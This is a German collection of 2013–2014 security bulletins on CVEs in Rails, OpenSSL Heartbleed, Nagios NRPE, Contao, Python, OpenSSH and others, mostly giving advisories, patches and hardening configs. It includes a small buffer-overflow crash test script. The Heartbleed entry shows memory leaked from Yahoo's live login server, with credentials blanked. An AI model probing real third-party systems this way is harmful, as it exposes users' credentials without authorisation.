Singlebrook stellt einen Patch vor, mit dem implicit controller komplett deaktiviert werden; mit diesem Fix soll es auch möglich sein, die Lücke in nicht mehr supporteten Versionen zu beheben (might break stuff) [5]

Workaround aus dem Advisory:

There are no feasible work arounds for this issue.

If your application depends on this functionality, you will need to rename
the route parameter and add an explicit action:

  get 'my_url/*template_path', controller: 'asdf', action: 'display'

Then add an action which renders explicitly:

  def display
    if !params[:template_path].index('.')
      render file: params[:template_path]
    end
  end

Note: The path check in this example may not be suitable for your
application, take care.

Referenzen

  1. ossec-security: AMENDED [CVE-2014-0130] Ruby on Rails: Directory Traversal Vulnerability With Certain Route Configurations
  2. rubyonrails-security: [CVE-2014-0130] Directory Traversal Vulnerability With Certain Route Configurations
  3. Route Globbing and Wildcard Segments
  4. Ville Lautanala: How we found a directory traversal vulnerability in Rails routes
  5. reddit-diskussion
  6. Closing CVE-2014-0130 in unsupported versions of Rails
  7. ossec-ml 1
  8. ossec-ml 2
  9. reddit-kommentar zum kern des problems
  10. The Anatomy of a Rails Vulnerability CVE-2014-0130: From Directory Traversal to Shell



SB 14.10 :: Lücke im FreeBSD - TCP-Stack ermöglicht Angreifern Lesen von Speicherbereichen

2014.05.02

Eine Lücke im FreeBSD - TCP-Stack ermöglicht einen DoS-Angriff und ggfs unerlaubten Zugriff auf zufällige Daten aus dem RAM, änhlich der Heartbleed-Lücke. Das FreeBSD - Advisory beschreibt das Problem und Workarounds; Admins wird dringend empfohlen, ihre Systeme auf den neuesten Stand zu bringen. [1]

Aus dem Advisory:

III. Impact

An attacker who can send a series of specifically crafted packets with a
connection could cause a denial of service situation by causing the kernel
to crash.

Additionally, because the undefined on stack memory may be overwritten by
other kernel threads, while extremely difficult, it may be possible for
an attacker to construct a carefully crafted attack to obtain portion of
kernel memory via a connected socket.  This may result in the disclosure of
sensitive information such as login credentials, etc. before or even
without crashing the system.

IV.  Workaround

It is possible to defend to these attacks by doing traffic normalization
using a firewall.  This can be done by including the following /etc/pf.conf
configuration:

    scrub in all

This requires pf(4) to be enabled, and have the mentioned configuration
loaded.

FreeBSD ist die OS-Grundlage für OSX, einige Juniper- und NetAPP - Appliances und weitere Consumer-Geräte, Fernseher u.a.

Referenzen

FreeBSD-SA-14:08:TCP reassembly vulnerability




SB 14.09 :: Nagios NRPE Remote Command Execution (CVE-2014-2913)

2014.04.20

Im Nagios Remote Plugin Executor (NRPE) wurde eine Lücke entdeckt, über die ein Angreifer beliebige Systemkommandos ausführen kann; ein entsprechendes Advisory inklusive POC wurde bereits veröffentlicht. [1,2]

Grundsätzlich sollte der NRPE nicht frei zugänglich sein, ähnliche Bugs wurden schon mehrmals im NRPE gefunden.

Workarounds:

  • Maskieren (quoten) der entsprechenden Kommandos in der nrpe.cfg [4]
command[check_ssh]=/etc/nagios/plugins/check_ssh "$ARG1$"
  • IPTABLES / Firewall-Restriktion
  • via xinetd => only_from = NAGIOS_SERVER
  • via nrpe/nrpe.cfg => allowed_hosts= NAGIOS_SERVER
  • nrpe / nrpe.cfg dont_blame_nrpe = 0 (deaktivieren von NRPE-Argumenten)
# nrpe.cfg
# ONLY change this if you exactly know what you are doing!
# this enabled arguments, which can be appended to checks
# Enabling this is a HIGH security risk, and should only
# be done in certain environments!
dont_blame_nrpe=0
  1. Advisory & POC: NRPE - Nagios Remote Plugin Executor <= 2.15 Remote Command Execution
  2. OSSEC-ML CVE Request: Nagios Remote Plugin Executor <= 2.15 Remote Command Execution
  3. Debian Bug Bug#745272
  4. Workaround-Empfehlung von Martin Carpenter @ ossec-ml



SB 14.08 :: Lücke in Contao erlaubt Remote File Inclusion

2014.04.15

Bereits letzte Woche wurde eine Lücke in Contao gemeldet und gefixt, durch die ein Angreifer die Datei pathconfig.php manipulieren und ggfs externe Scripte ausführen kann (RemoteFileInclusion). Der Bug betrifft die beiden stabilen Branches für 2.11 als auch 3.x [1,2,3].

Betreibern von Contao-Installation wird dringend empfohlen, den Zugriff auf den /contao-Ordner umgehend zu sperren und die Updates zu installieren.

Die folgenden Apache-Config-Snippets bieten einen serverseitigen Schutz der entsprechenden Dateien; ggfs kann das erste Snippet auch auf den gesamten /contao/ - Ordner ausgeweitet werden, um das Backend grundsätzlich vor unerlaubtem Zugriff zu schützen.

  • serverweiter htpasswd-Schutz für contao/install.php; schütz alle (auch die vergessenen) Contao-Installationen auf einem Apache-Server
  • dieses Snippet vor der ersten - Config einfuegen; ein entsprechendes AuthUserFile muss mit htpasswd erstellt werden
<LocationMatch /contao/install.php>
   AuthType Basic
   AuthName "Contao Install"
   AuthGroupFile /dev/null

   AuthUserFile /path/to/htpasswd
   Require valid-user

</LocationMatch>
  • das folgende Snippe sperrt den Zugriff auf contao/install.php und muss entweder via .htaccess oder in der entsprechenden - config eingerichtet werden
RewriteEngine On
RewriteRule /contao/install.php - [F]


# zusätzliche Optionen in der php.ini

allow_url_fopen = Off
allow_url_include = Off

Entsprechende Naxsi-Signaturen wurden bereits gestern zur Verfügung gestellt [4,5]

Referenzen

  1. Contao-Bug: Fail with pathconfig.php #6855
  2. Contao 3.2.9 is available
  3. Contao Open Source CMS Changelog (3.2.9)
  4. Naxsi Ruleset-Update / Contao-Sigs
  5. Contao-Rules commit



SB 14.07 :: Herzbluten: Kritische Lücke in OpenSSL ermöglicht Auslesen von Keys (CVE-2014-0160)

2014.04.08

heartbleed.png

The longer it takes for a bug to surface, the harder it is to find.
- Roedy Green (src, full)

Am 07.04. wurde in einem konzertierten Responsive Disclosure ein Bug in OpenSSL veröffentlich, mit dem das Auslesen von Speicherbereichen und womöglich von Private Keys möglich ist. [1,2]

Der Bug steckt in der Heartbeat-TLS-Erweiterung, die mit der Version 1.0.1 eingeführt wurde; unglücklicherweise lässt sich diese Extension nicht per Konfigurationsoption deaktivieren.

Administratoren betroffener Systeme sollten umgehend Updates einspielen.

Nach Angabe von Ivan Ristic sind ca 30% der Server im Internet, die SSL anbieten, anfällig: [8], Arstechnica spricht bei 28.Millionen überprüften Webservern von 600.000 verwundbaren; das wären ca 3% [14], Netcraft geht von 17% (500.000) anfälliger SSL-Server aus. [16]

 Up to 30% of the servers in the SSL Pulse data set support TLS 1.2. 
 Most of them are probably vulnerable to the OpenSSL heartbeat bug.
                                                                                            - Ivan Ristic

Als grobe Faustregel kann gelten: Wenn ein Open-Source-Produkt verwendet wird und TLS 1.2 verfügbar, dann ist der Dienst mit sehr hoher Wahrscheinlichkeit von der Lücke betroffen gewesen.

Es gibt Anzeichen, dass die Lücke schon früher ausgenutzt wurde, auch wenn dies momentan (2014-04-10) noch nicht zu 100% verifiziert werden konnte. [12]

Betroffene Versionen:

  • OpenSSL 1.0.1 bis 1.0.1f (inklusive) sind gefährdet
  • OpenSSL 1.0.1g ist NICHT gefährdet
  • OpenSSL 1.0.0 branch ist NICHT gefährdet
  • OpenSSL 0.9.8 branch ist NICHT gefährdet

Analysen

Workarounds

Die großen Distributionen, bis auf Novell, bieten mittlerweile Updates an [6,7]. Sollte man nicht in der Lage sein, Updates einspielen können, so empfehlen die Entwickler, OpenSSL mit der Option -DOPENSSL_NO_HEARTBEATS erneut zu kompilieren, um Heartbeats auszustellen.

Theoretisch müssten Admins betroffener Systeme nach Fixen der Lücke die alten SSL-Zertifikate und Keys löschen, und neue Keys und Zertifikate installieren; umgehen lässt sich dies durch die Implementierung von PFS [3]; ein Beispiel für PFS-fähige Cipher-Suiten für Webserver liefern die Artikel "Guide to Nginx + SSL + SPDY" [4] und "Configuring Apache, Nginx, and OpenSSL for Forward Secrecy" [5].

FAQ

kurze tl;dr Antworten, ausführlichere Antworten siehe Links

Heartbleed: What is it and what are options to mitigate it?

What should one do about the Heartbleed OpenSSL exploit?

Does Heartbleed mean new certificates for every SSL server?

"It means much more than just new certificates (or rather, new key pairs) for every affected server. It also means:

  • Patching affected systems to OpenSSL 1.0.1g
  • Revocation of the old keypairs that were just superseded
  • Changing all passwords
  • Invalidating all session keys and cookies
  • Evaluating the actual content handled by the vulnerable servers that could have been leaked, and reacting accordingly.
  • Evaluating any other information that could have been revealed, like memory addresses and security measures

Can Heartbleed be used to obtain memory from other processes?

"... you won't be able to read the memory of any other process, so those "business critical documents" would need to be in memory of the process, less than 64KB, and be nearby pl.

Is OpenSSH affected also?

"It's worth pointing out that OpenSSH is not affected by the OpenSSL bug. While OpenSSH does use openssl for some key-generation functions, it does not use the TLS protocol (and in particular the TLS heartbeat extension that heartbleed attacks). So there is no need to worry about SSH being compromised, though it is still a good idea to update openssl to 1.0.1g or 1.0.2-beta2 (but you don't have to worry about replacing SSH keypairs)."

Test der eigenen Implementation

  • lokal: openssl version
[ me@host :~] > openssl version
OpenSSL 1.0.1g 7 Apr 2014

Auswirkungen

SSL Private Keys

Um die Unsicherheiten zum Thema Zugriff auf SSL-Private-Keys zu beseitigen, hat Cloudlflare eine Challenge gestartet, um die Private Keys aus einer verwundbaren Nginx-Installation zu extrahieren. 9h nach Start ist es mehreren Mitgliedern der Community gelungen, unabhängig voneinander die Private Keys aus den per Heartbleed gewonnenen Daten zu extrahieren. [13,15]

In einem kurzen Gist erklärt einer der Rätsellöser, mit welchen Schritten er aus dem Memory-Dump an den Private Key kam [14].

Mit den Ergebnissen dieser Challenge wird klar, dass das Extrahieren des Private Key zwar nicht trivial, aber doch möglich ist, und das selbst Server, die nicht gerade frisch rebootet wurden, anfällig dafür sind.

Login-Daten Durch den Bug kann ein Anreifer auf aktuell im Speicher befindliche Daten zugreifen. Mit Glück lassen sich so Passwörter und andere sensible Daten auslesen; uns ist am Beispiel Yahoos gelungen, einen Loginvorgang aufzuzeichnen (Logins/Passwörter und Tokens wurden unkenntlich gemacht):

$ readbleed login.yahoo.com

Connecting...
Sending heartbeat request..
Received heartbeat response:

=Sdsd%32g..Connection: keep-alive..Pragma: no-cache..Cache-Control: 
no-cache.....src=ym&.tries=1&.done=https%3A%2F%2Fde-mg42.mail.yahoo
.com%2Fneo%2Flaunch%3Freason%3Dignore%26rs%3D1%26ufb%3D1&.md5=&.has
h=&.js=&.partner=&.slogin=XXXXXXXXX&login=XXXXXXXXX&.ws=1&.cp=0&.in
tl=us&.lang=en-US&.fUpdate=&.prelog=&.bid=&.aucid=&.challenge=XXXXX
XXXXXXXXXXXXXXXXXXXXXXX&.yplus=&.chldID=&pkg=&hasMsgr=0&.pd=ym_ver%
3D0%26c%3D%26ivt%3D%26sg%3D&.u=XXXXXXXXXXXXX&.persistent=y&pad=XXXX
X=6&passwd=XXXXXXXX&.save=&passwd_raw=XXXXX.X.X..v...Vttps%253A%252
F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253Dhttps%
25253A%25252F%25252Fwww.flickr.com%25252Fphotos%25252FXXXXXXX&.pd=-
flickrsignin_ver%3D0%26c%XXXXXXXXXXXXXXXXX--%26ivt%3D%26sg%3D&.ws=1
&.cp=0&nr=0&pad=XXXXX=6&login=XXXXXXXXXXXX&passwd=XXXXXXXXXXXXXXXX&
.persistent=&.save=........

Updates

  • Update 1 - FAQ
  • Update 2 - Analysen
  • Update 3 - Python-CLI-Tool
  • Update 4 - Web-Test
  • Update 5 - Snort-Signaturen (siehe Referenzen)
  • Update 6 - SSLLabs - Test verfügbar
  • Update 7 - Arstechnika-Link
  • Update 8 - Auswirkungen (private keys, refs, challenge)
  • Update 9 - Nachwirkungen (links)

Referenzen

  1. OpenSSL Security Advisory 07 Apr 2014 - TLS heartbeat read overrun (CVE-2014-0160)
  2. Advisory auf heartbleed.com
  3. IRistic - Kommentar
  4. Guide to Nginx + SSL + SPDY
  5. Configuring Apache, Nginx, and OpenSSL for Forward Secrecy
  6. Debian @ CVE-2014-0160
  7. RedHat: Bug 1084875 - (CVE-2014-0160) CVE-2014-0160 openssl: information disclosure in handling of TLS heartbeat extension packets
  8. Ivan Ristic - Kommentar zur Anzahl der betroffenen Server
  9. existential type crisis : Diagnosis of the OpenSSL Heartbleed Bug
  10. IT Security FAQ @ heartbleed
  11. Snort/Suricata-Signaturen
  12. Heartbleed vulnerability may have been exploited months before patch
  13. HN: CloudFlare's Heartbleed challenge cracked
  14. epixoip: How I obtained the private key for www.cloudflarechallenge.com
  15. Answering the Critical Question: Can You Get Private SSL Keys Using Heartbleed? / cloudflare
  16. Half a million widely trusted websites vulnerable to Heartbleed bug / netcraft.com
  17. OpenSSL Valhalla Rampage



SB 14.06 :: Horde Framework PHP Object Injection Vulnerability

2014.03.25

Eine Lücke im Horde-Framwork <= 5.1.1 ermöglich das Einschleusen von PHP Objects und damit das Ausführen beliebiger PHP-Befehle mit den Rechten des Webserver-Users.

In einem Artikel erläutert Egidio Romano Details zur Lücke und mögliche Angriffsvektoren, [1], ein Metasploit-Modul ist mittlerweile via PacketStorm verfügbar.

PHP Object Injections sind im letzten Jahr in einer Reihe von populären Webapps bekannt geworden, u.a. Contao, Wordpress, Typo3, Joomla, und werden wahrscheinlich in Zukunft einige Aufmerksamkeit von Seiten der Hacker-Community erfahren.

Für User der Doxi-Regelsätze der Naxsi-WAF Verfügung seit einem Monat über eine generische Regel (SID: 42000343), die diese Art der Angriffe erkennt und blockt. [3,4]

Referenzen

  1. Exploiting CVE-2014-1691: Horde Framework PHP Object Injection Vulnerability
  2. PacketStorm: Horde Framework Unserialize PHP Code Execution
  3. Doxi: 42000343 - possible PHP Object Injection
  4. WebApplicationFirewall (WAF) mit Nginx + Naxsi



SB 14.05 :: Nginx 1.4.7 behebt Sicherheitslücke im SPDY-Modul (CVE-2014-0133)

2014.03.21

Nginx 1.4.7 behebt eine Sicherheitslücke im SPDY-Modul, durch die man möglicherweise Code mit Rechten des Nginx-Users ausführen kann.

Ein POC ist momentan nicht bekannt; Stand: 21.03.2014.

Aus dem Advisory:

"Changes with nginx 1.4.7 18 Mar 2014

*) Security: a heap memory buffer overflow might occur in a worker process while handling a specially crafted request by ngx_http_spdy_module, potentially resulting in arbitrary code execution (CVE-2014-0133).

Thanks to Lucas Molas, researcher at Programa STIC, Fundación Dr. Manuel Sadosky, Buenos Aires, Argentina.

Referenzen




SB 14.04 :: Python Remote Code Execution in socket.recvfrom_into() - CVE-2014-1912

2014.02.25

Mitte Januar wurde ein Bug in Python gemeldet, durch den es möglich ist, Befehle auf einem entfernten System auszuführen; das Problem steckt in der Funktion socket.recvfrom_into(), die übergebene Werte ungenügend prüft. [1]

Vor einigen Tagen wurde ein POC zu diesem Bug auf Pastebin veröffentlich, der in einer modifizierten Version zu einem funktionierende Remote-Exploit weiterentwicklet wurde. [2,3]

Betroffen sind alle Versionen ab 2.5, Patches für den 2.7er und 3.4er - Zweig stehen bereit, die großen Distros stellen, bis auf Fedora, noch keine Updates bereit. [4,5]

Von uns getestete Python-basierte Application-Server (Flask, Django) sind nicht von der Lücke betroffen.

Mit einem kleinen Script kann man überprüfen, ob das eigene System verwundbar ist: wenn das Script mit einem Segmentation fault abstürzt, besteht Handlungsbedarf.

# testscript
# --------- BEGIN SEGFAULT ---------

import socket
r, w = socket.socketpair()
w.send(b"X" * 1024)
r.recvfrom_into(bytearray(), 1024)

------------------------------------

$ python py_cve-2014-1912-.py 
Segmentation fault
$ 
  1. bugs.python.org: buffer overflow in socket.recvfrom_into
  2. POC @ pastebin
  3. TrustedSec:Python Remote Code Execution in socket.recvfrom_into()
  4. security-tracker.debian.org: CVE-2014-1912
  5. bugzilla.redhat.com



SB 14.03 :: Lücke in Rubygem Paperclip kann zu RemoteCodeExecution führen

2014.02.10

Eine Lücke in "Paperclip" [3], dem populärsten Upload-Tool für RubyOnRails, erlaubt ungefilterten Dateiupload und darüber dann XSS und höchstwahrscheinlich RemoteCodeExecution.

Wie Egor Homakov in seinem Blog [1] erklärt, war es ihm möglich, die Validierung komplett zu umgehen und Dateien mit beliebigen Endungen via Paperclip hochzuladen.

Die Paperclip-Entwickler haben bereits reagiert und die neuen Versionen mit einer erweiterten Validierung versehen [2] und die Lücke geschlossen; Entwickler, die dieses Gem benutzen, sollten ihre Installation dringend auf eine Version >= 4.0 updaten und überprüfen, dass sie die richtigen Content-Types erlauben.

Referenzen

  1. Egor Homakov: Paperclip vulnerability leading to XSS or RCE.
  2. Paperclip Security Validations
  3. Paperclip



SB 14.02 :: Contao erlaubt RemoteCodeExecution

2014.02.10

Pedro Ribeiro hat eine Lücke in Contao entdeckt [1,2], die PHP Object Injection erlaubt und weitergehend ggfs Remote Code Execution; ein Angreifer ist damit in der Lage, beliebige Befehle mit den Rechten des Webservers auszuführen und Daten auszulesen. Nach einer Diskussion auf Fulldisclosure [1] über die Auswirkungen der Lücke veröffentlichte Stefan Esser einen POC [5], mitdem eine RCE möglich ist.

Updates für Contao 3.x und 2.11.x stehen bereit [3,4], Betreibern von Contao-Installationen wird dringend angeraten, die Updates so schnell wie nöglich einzuspielen.

Betreiber von Naxsi-WAFs mit Doxi-Regelsätzen [6] sind gegen die Ausführung von PHP-Befehlen durch Usereingaben immun.

Referenzen

  1. [CVE-2014-1860] PHP object insertion / possible RCE in Contao CMS <= 3.2.4 @ fulldisclosure
  2. PoC / contao-3.2.4.txt
  3. Contao 3.2.5 is available
  4. Contao 2.11.14 is available
  5. POC by Stefan Esser
  6. Doxi-Extended Naxsi Rulesets



SB 14.01 :: Kritische Lücke in MediaWiki erlaubt RemoteCodeExecution

2014.01.30

Das Check Point Research Team hat eine kritische Lücke in MediaWiki entdeckt [1], die es einem Angreifer erlaubt, beliebige Befehle auf dem MediaWiki - Server auszuführen und unberechtigt Dateien auszulesen. Die MediaWiki - Entwickler stufen die Lücke als "Immediate Critical" ein und haben die Lücke bereits gefixt [2]. Betroffen sind alle Versionen von 1.8 aufwärts.

Mitteilung auf der offiziellen MediaWiki - Mailinglist: "Your MediaWiki installation is affected by a remote code execution vulnerability if you have enabled file upload support for DjVu (natively supported by MediaWiki) or PDF files (in combination with the PdfHandler extension). Neither file type is enabled by default in MediaWiki installations. If you are affected, we strongly urge you to update immediately." [3]

Betreiber von MediaWiki - Installation wird dringend angeraten, die bereitstehenden Updates einzuspielen oder Installationen per htaccess abzusichern.

MediaWiki ist ein populäres Open-Source-Wikisystem, wird in mehreren 10.000 öffentlichen und internen Wikis eingesetzt und ist die Basis der Wikipedia.


Links

  1. Check Point Security Researchers Discover Critical Vulnerability in MediaWiki Platform
  2. Bug 60339 - Reported RCE in djvu thumbnailing
  3. [MediaWiki-announce] MediaWiki Security Releases: 1.22.2, 1.21.5 and 1.19.11



SB 13.23 :: Löchrig: Rails-Applikationen leaken sensible Daten

2013.12.02

Egor Homakov hat bereits im Mai in einem Blogpost beschrieben[1], dass Rails-basierte Applikationen ein Leck haben können und Zugriff auf sensitive Daten wie Auth-Tokens oder Applikationsdaten durch unberechtigte Dritte besteht. Das Problem besteht in de Benutzung von RJS (Ruby JavaScript), wie die Blogposts unter [2] und [1] erklären.

In einem weiteren Artikel [2] benennt Egor nun einige populäre Webseiten, die von dieser Lücke betroffen sind:

  • Gitlab
  • Basecamp
  • Redmine
  • Disapora
  • Spree!

Im Zusammenhang mit der bereits im September gemeldeten Rails-Lücke [3] ist dieses Sicherheitsproblem äußerst ernst zu nehmen.

Der weitere Einsatz der RJS-Technik wird auf der Rails-Entwickler-Mailingliste diskutiert, [4] die Gitlab-Enwickler hbaen bereits reagiert [5].

  1. Do not use RJS-like techniques / Egor Homakov
  2. RJS leaking vulnerability in multiple Rails applications / Egor Homakov
  3. Security Bulletin 13.17 :: Lebenslänglich: Rails speichert SessionCookies ohne Verfallsdatum
  4. Remove :js responder / Diskussion auf der Rails-Dev-ML
  5. Drop rjs from Issues#index / gitlabhq @ github



SB 13.22 :: Lücke in OpenSSH

2013.11.14

OpenSSH in den Versionen 6.2/6.3 enthält eine Lücke, die es angemeldeten Benutzern erlaubt, unerlaubt Befehle mit Userrechten ausführen zu können. Dies betrifft vor allem Installationen, die SSH zum Datentransfer nutzen (git, svn, rsync, sftp, scp etc.) und auf denen normalerweise keine Login-Shell vorhanden ist. Die Lücke ist nur Post-Auth ausnutzbar.

In einem Adivsory des OpenSSH-Teams [1] wird das Problem und gleichzeitig ein Workaround beschrieben:

  • Disable AES-GCM in the server configuration. The following sshd_config option will disable AES-GCM while leaving other ciphers active
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc

Nach eine HN-Thread [3] sind folgende Linux-Distributionen betroffen:

  • Debian 7 (wheezy) -- OpenSSH_6.0p1 Debian-4, OpenSSL 1.0.1e 11 Feb 2013 (Supports AES-GCM)
  • Ubuntu 13.10 (Saucy) -- Version match: OpenSSH_6.2p2 Ubuntu-6, OpenSSL 1.0.1e 11 Feb 2013 (Supports AES-GCM)
  • Ubuntu 12.04.3 LTS (Precise) -- OpenSSH_5.9p1 Debian-5ubuntu1.1, OpenSSL 1.0.1 14 Mar 2012 (Supports AES-GCM)
  • Ubuntu 12.10 (Quantal) -- OpenSSH_6.0p1 Debian-3ubuntu1, OpenSSL 1.0.1c 10 May 2012 (Supports AES-GCM)
  • Arch Linux -- Version match: OpenSSH_6.3p1, OpenSSL 1.0.1e 11 Feb 2013 (Supports AES-GCM)
  • Fedora 18 (Spherical Cow) -- OpenSSH_6.1p1, OpenSSL 1.0.0-fips 29 Mar 2010 (Supports AES-GCM)
  • Fedora 19 (Schrödinger’s Cat) -- Version match: OpenSSH_6.2p2, OpenSSL 1.0.0-fips 29 Mar 2010 (Supports AES-GCM)
  • openSUSE 12.3 (Dartmouth) -- OpenSSH_6.1p1, OpenSSL 1.0.1e 11 Feb 2013 (Supports AES-GCM)

folgende Systeme gelten als nicht betroffen:

  • CentOS 5.10 -- OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008 (No AES-GCM support)
  • CentOS 6.4 -- OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010 (No AES-GCM support)
  • Debian 6 (squeeze) -- OpenSSH_5.5p1 Debian-6+squeeze4, OpenSSL 0.9.8o 01 Jun 2010 (No AES-GCM support)
  • Ubuntu 10.04.4 LTS (Lucid) -- OpenSSH_5.3p1 Debian-3ubuntu7, OpenSSL 0.9.8k 25 Mar 2009 (No AES-GCM support)

Eigenen Systeme kann man auf verschiedene Weise testen:

  • via nmap und NSE: nmap --scripts ssh2-enum-algos $HOST | grep aes*gcm; das NSE-Script kann man unter [2] herunterladen

  • via ssh unter Angabe der Cipher: ssh -c aes256-gcm@openssh.com $HOST

  1. OpenSSH-Advisory
  2. ssh2-enum-algos.nse
  3. Hacker-News: OpenSSH security advisory



SB 13.21 :: Einbruch bei MongoHQ - Update 1

2013.10.30

Update 1 - 31.10.2013

MongoHQ hat weitere Details veröffentlicht, die den unberechtigten Zugriff auf Kundendatenbanken bestätigen; betroffene Kunden sind bereits informiert, anbei der Original-Wortlaut [1]:

We have additional details on the scope of access to customer data, including start dates. Customer data was accessed in two ways:

  • Through our web UI (impersonated accounts): we have comprehensive web activity logs and have identified instances of third party access to some customer accounts.

  • Direct database access: the attackers were able to use the impersonation feature to access the MongoHQ accounts database, and used connection information to access some customer databases directly. Our logs indicate third party access to these databases beginning on October 27th, 2013.

We are still notifying customers directly when we find evidence of unauthorized access to their databases or impersonations of their web accounts. If you have not heard from us yet, we still recommend being paranoid and taking steps to mitigate potential problems resulting from unauthorized access to your data.

Our investigations into this incident are ongoing. Currently, it appears that the unauthorized user was scanning for social media authentication information for spamming purposes, and probing for financial information in customer database.


MongoHQ informierte am 28.Oktober über einen Einbruch [1] und unerlaubten Zugriff auf interne Administrationssysteme.

Mit diesen Informationen wäre ein Angreifer u.U. in der Lage, eine Liste der Datenbanken, Kunden-Emails und bcrypt-geschützte DB-Passwörter auszulesen. Weiterhin kann nicht ausgeschlossen werden, dass vereinzelt Zugriff auf Kundendatenbanken bestand oder die Angreifer Zugriff auf die Rechnungssysteme erlangen konnte; betroffene Kunden wurden bereits informiert.


  1. Advisory: MongoHQ Security Breach



SB 13.20 :: vBulletin exploit in the wild

2013.10.12

Am 27. August gab das vBulletin-Team ein Advisory heraus, indem vor einem Exploit für die v4+ und v5+ gewarnt wurde; als Workaround wurde Administratoren empfohlen, den Installationsordner (v4: /install v5: /core/install) zu löschen.

Am 5. September tauchten erste Berichte[2] im vBulletin-Forum über erfolgreiche Exploitversuche auf; auf Help-Net-Security beschreibt Barry Shteiman[3] nun detaillierte die Attacken und Exploitvektoren.

Naxsi-Signaturen stehen unter [4]. bereit.

  1. www.vbulletin.com Advisory
  2. vBulletin-Diskussion
  3. Help-Net-Security: Dangerous vBulletin exploit in the wild
  4. Naxsi-Sigs



SB 13.19 :: WHMCS - Exploit in the wild

2013.10.07

2013-10-07

Für die am letzten Donnerstag (03.10.) aufgetauchte Lücke [1] in der Serververwaltungssoftware WHMCS sind bereits Exploits im Umlauf, u.a. ist PureVPN davon betroffen[2]; eine weitere Zusammenfassung der Lücke und deren Auswirkungen liefert das Tripwire-Blog[3].

Bereits einige Stunden nach der Veröffentlichung der Lücke auf localhost.re machten die WHCMS-Entwickler in einem Advisory auf die Lücke aufmerksam und stellten Updates bereit. [4]

Naxsi-Signaturen sind verfügbar. [5]

  1. localhost.re/p/whmcs-527-vulnerability
  2. www.purevpn.com/blog/fake-email-to-clients-update-1/
  3. www.tripwire.com/state-of-security/top-security-stories/purevpn-hit-whmcs-zero-day/
  4. blog.whmcs.com/?t=79427
  5. blog.dorvakt.org/2013/10/ruleset-update-whcms-exploit-jbosstomcat.html



SB 13.18 :: SSL - Zertifikate mit 1024 Bit Schlüssellänge werden zum 1.10. ungültig

2013.09.30

Ab dem 01.Oktober.2013 wird Thawte die Funktionalitaet von SSL - Zertifikaten mit 1024 Bit Schlüssel einstellen. Ab diesen Tag werden alle noch nicht auf 2048 Bit umgestellten Zertifiate nicht mehr funktionieren; diese Zertifikate müssen neu bestellt werden [1]


P.S.: Alle über MARE system in den letzten 5 Jahren bezogenen Zertifikate sind davon nicht betroffen.

  1. 1024-bit-Migration FAQ



SB 13.17 :: Lebenslänglich: Rails speichert SessionCookies ohne Verfallsdatum

2013.09.27

RubyOnRails speichert SessionCookies im CookieStore "for Lifetime"; d.h. Sessions werden nach Ablauf der SessionTime oder bei z.B. Logout aus einer Webapplikation nicht verworfen/invalidiert, sondern bleiben bestehen, solange die Session im Cookiestore geführt wird; und das ist per default: für immer. [1,2]

Angreifer könmnen damit Sessions zu übernehmen, die schon lange zurückliegen, wenn die Cookies z.B. im Browser gespeichert bleiben.

Die Lücke existiert in den Rails-Version 2-4 und ist schon seit mind. 2 Jahren bekannt[3]; in dem unter [3] verlinkten Artikel werden Workarounds beschrieben, als User kann man sich ggfs davor schützen, indem nur SSL-verschlüsselte Webapplikationen genutzt werden, un der der Browsercache mit den Cookies beim Beenden des Browsers gelöscht wird.

  1. http://maverickblogging.com/logout-is-broken-by-default-ruby-on-rails-web-applications/
  2. http://osvdb.org/show/osvdb/97726
  3. http://www.bryanrite.com/ruby-on-rails-cookiestore-security-concerns-lifetime-pass/



SB 13.16 :: Lücke und Exploits für alle Versionen des InternetExplorers

2013.09.21

In einem Adivsory[1] warnt Microsoft vor einer schwerwiegenden Lücke in allen momentan unterstützten IE-Versionen. Nach Aussage des ISC SANS [2] sind seit Ende August bereits Exploits im Umlauf, die die Lücke aktiv ausnutzen. Aufgrund der Bedrohungslage wurde das SANS ThreatLevel auf Yellow gesetzt.

isc sans

Microsoft stellt einen Fix-it-Hotpatch[3] bereit, um die Lücke zu schließen; einen vollen Patch will man am nächsten Patch-Day im Oktober nachliefern.

  1. http://technet.microsoft.com/en-us/security/advisory/2887505
  2. http://isc.sans.edu/
  3. http://blogs.technet.com



SB 13.15 :: WordPress Remode Code Execution

2013.09.12

Tom Van Goethem hat eine Lücke im aktuellen Wordpress gefunden[1], die es potentiellen Angreifen erlaubt, serverseitige Befehle mit den Rechten des Webservers auszuführen (RemoteCodeExecution).

Ein POC kursiert noch nicht, es wurden vom Finder der Lücke aber bereits ausnutzbare Wordpress-Plugins gefunden.

Wordpress hat Updates (Version 3.6.1) bereitgestellt, die die Lücke schließen.[2]

  1. vagosec.org/2013/09/wordpress-php-object-injection/
  2. wordpress.org/news/2013/09/wordpress-3-6-1/



SB 13.14 :: SSL scans from 188.95.234.6

2013.08.30

Das Team vom Lehrstuhl für Netzarchitekturen und Netzdienste (IU8) der TU München führt vom 2.September an IPv4 - weite SSL-Scans durch.

Original-Ankündigung:

Dear colleagues,

Our team at the Network Architectures and Services Dept. (I8) of TU München, Germany, is carrying out an IPv4-wide SSL/TLS scan on SSL ports to determine the state of the SSL landscape. The starting date of our scans is Sunday, 2 September 2013.

The purpose is purely scientific. As with our other scans, this is a large-scale scan, which we expect to last about 5-6 days. The scanning machine is 188.95.234.6. It is not infected, nor is an attack intended.

(Please note: this mail is also sent to systems that already are on our blacklist)

Technical details

The scanning procedure is as follows. First, we sweep IP addresses with an nmap port scan on SSL ports, i.e. 443, 465,993,995,6697 for normal SSL and 25,110,143,587 for STARTTLS. This gives us an idea how many servers offer SSL connectivity. For HTTPS, we also send a HEAD command to read the server version. For the STARTTLS protocols, we also send a QUIT command to close the connection gracefully.

In general, we only connect once. There is one exception. If you are running an nginx configuration, we will connect a second time to determine whether your server offers OCSP stapling. This second connection is necessary due to nginx's caching behaviour. The second connection does not occur immediately; rather we put the request in a TODO-queue and won't reconnect until a few seconds later.

Possible IDS warnings

In general, we try to be as non-intrusive as possible. Still, some IDS systems will count our scans as an attack. We are thus writing this in order to inform you of our activity. If there is anything you can do - adding us to a whitelist, adding a comment in your DB etc. - we would very much appreciate your help.

Further information

Some information on what our group is doing can also be found here:

29C3 Talk: http://www.youtube.com/watch?v=29h21n-tyfE&t=46m26s

